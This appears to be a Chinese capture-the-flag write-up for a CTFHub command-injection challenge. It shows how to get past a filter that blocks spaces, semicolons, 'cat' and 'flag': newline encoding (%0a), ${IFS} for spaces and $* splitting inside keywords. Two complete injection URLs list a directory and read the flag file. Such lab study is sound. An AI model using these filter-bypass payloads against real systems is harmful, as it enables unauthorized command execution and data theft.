CTFHub技能书解题笔记-RCE-综合过滤练习

CTFHub技能书解题笔记-RCE-综合过滤练习_第1张图片

直接开题,综合过滤。提示我们:同时过滤了前面几个小节的内容, 如何打出漂亮的组合拳呢?

估计也是直接给了源码。直接打开链接,看到他过滤了,空格、/、\&、cat flag一堆。

        CTFHub技能书解题笔记-RCE-综合过滤练习_第2张图片

这里我们慢慢绕过吧。一层层过。

首先,还是查看文件,LS他没过滤,但是过滤了;号,这里得找个替代,通过查url编码表发现%0a可以实现换行。

CTFHub技能书解题笔记-RCE-综合过滤练习_第3张图片

 进行利用,发现;可以通过%0a代替

CTFHub技能书解题笔记-RCE-综合过滤练习_第4张图片

ls执行成功,看到了flag的位置,这里cat被过滤,可以使用nl之类的代替,通过查大佬们的wp和资料得知,空格可以用${IFS}代替,在没有定义的情况下,$*在shell命令执行下为空,url编码中,%0a是换行符,%0d是回车符,可以用这两个进行命令拼接。

现在准备的差不多了。开始实验:构造语句
http://challenge-044b9eff1bf87545.sandbox.ctfhub.com:10800/?ip=114.114.114.114%0Als${IFS}fl$*a$*g_is_here#

 CTFHub技能书解题笔记-RCE-综合过滤练习_第5张图片

查看flag文件:

http://challenge-044b9eff1bf87545.sandbox.ctfhub.com:10800/?ip=114.114.114.114%0Acd${IFS}fl$*a$*g_is_here%0anl${IFS}f$*la$*g_227663082417976.php#
CTFHub技能书解题笔记-RCE-综合过滤练习_第6张图片
拿到flag。

你可能感兴趣的:(CTFhub,web安全,网络安全,php)